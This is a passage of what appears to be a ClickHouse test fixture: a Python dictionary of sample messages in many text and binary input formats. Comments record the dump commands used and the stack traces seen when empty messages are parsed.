# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit this test and is tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
# 'Template' : {
# 'data_sample' : [
# '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '' # tolerates
# ],
# 'extra_settings': ", format_template_row='template_row.format'"
# },
'Regexp': {
'data_sample': [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': r", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# ''
# On empty message exception happens: DB::Exception: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/VarInt.h:135: void DB::readVarUIntImpl<false>(unsigned long&, DB::ReadBuffer&) @ 0x15c68bb7 in /usr/bin/clickhouse
# /src/IO/VarInt.h:149: DB::readVarUInt(unsigned long&, DB::ReadBuffer&) @ 0x15c68844 in /usr/bin/clickhouse
# /src/DataStreams/NativeBlockInputStream.cpp:124: DB::NativeBlockInputStream::readImpl() @ 0x1d3e2778 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/NativeFormat.h:42: DB::NativeInputFormatFromNativeBlockInputStream::generate() @ 0x1df1ea79 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'MsgPack': {
'data_sample': [
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x01\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x02\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x03\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x04\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x05\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x06\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x07\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x08\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x09\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0a\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0b\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0c\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0d\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0e\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0f\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
# ''
# On empty message exception happens: Unexpected end of file while parsing msgpack object.: (at row 1)
# coming from Processors/Formats/Impl/MsgPackRowInputFormat.cpp:170
],
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# On empty message exception happens: DB::Exception: Cannot read all data. Bytes read: 0. Bytes expected: 8.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:108: void DB::readPODBinary<long>(long&, DB::ReadBuffer&) @ 0x15c67715 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:737: std::__1::enable_if<is_arithmetic_v<long>, void>::type DB::readBinary<long>(long&, DB::ReadBuffer&) @ 0x15e7afbd in /usr/bin/clickhouse
# /src/DataTypes/DataTypeNumberBase.cpp:180: DB::DataTypeNumberBase<long>::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cace581 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# !!! On empty message segfault: Address not mapped to object
# /contrib/FastMemcpy/FastMemcpy.h:666: memcpy_fast @ 0x21742d65 in /usr/bin/clickhouse
# /contrib/FastMemcpy/memcpy_wrapper.c:5: memcpy @ 0x21738235 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:145: DB::ReadBuffer::read(char*, unsigned long) @ 0x15c369d7 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:155: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c68878 in /usr/bin/clickhouse
# /src/DataTypes/DataTypeString.cpp:84: DB::DataTypeString::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cad12e7 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'Protobuf': {
'data_sample': [
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
